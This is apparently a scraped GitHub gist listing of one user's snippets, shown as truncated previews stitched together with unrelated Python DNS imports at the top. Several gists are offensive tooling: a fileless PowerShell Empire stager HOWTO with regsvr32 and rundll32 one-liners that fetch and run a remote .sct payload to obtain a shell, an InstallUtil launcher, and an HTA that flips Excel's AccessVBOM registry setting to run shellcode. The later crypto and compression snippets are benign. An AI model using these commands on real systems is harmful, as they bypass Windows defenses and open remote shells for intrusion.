# coding=utf-8
import datetime
import sys
import time
import threading
import traceback
import SocketServer
from dnslib import *
khr0x40sh / HOWTO
Created April 19, 2016 14:32
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
khr0x40sh / empire.cs
Created April 19, 2016 14:32
PowerShell Empire via InstallUtil.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
khr0x40sh / InstallUtil.hta
Created April 19, 2016 14:34
Download And Compile
//Set your settings
var strFileURL = "";
var oTest = new ActiveXObject("");
var pathTest = oTest.ExpandEnvironmentStrings("%USERPROFILE%") + "\\Downloads\\execalc.html";
var strHDLocation = pathTest;
khr0x40sh / CalcExcel.hta
Created April 19, 2016 14:35
Shellcode Execution Via HTA
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
khr0x40sh / elgamal.ps1
Created April 19, 2016 14:36
ElGamal Encryption in PowerShell
ElGamal in PowerShell
by Casey Smith @subTee
The key generator works as follows:
Alice generates an efficient description of a cyclic group G of order q ,with generator g.
Alice chooses an x randomly from 1 - (q-1)
Alice computes h = g^x.
khr0x40sh / mscorlib_load_assembly.vba
Created October 1, 2019 13:28 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
Const LS As LongPtr = 4&
khr0x40sh / psCompress.ps1
Created April 6, 2023 17:16 — forked from marcgeld/psCompress.ps1
Powershell: Compress and decompress byte array
# Compress and decompress byte array
function Get-CompressedByteArray {
Param (
[byte[]] $byteArray = $(Throw("-byteArray is required"))
Process {
khr0x40sh / PowershellAes.ps1
Created April 6, 2023 17:21 — forked from ctigeek/PowershellAes.ps1
Aes Encryption using powershell.
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)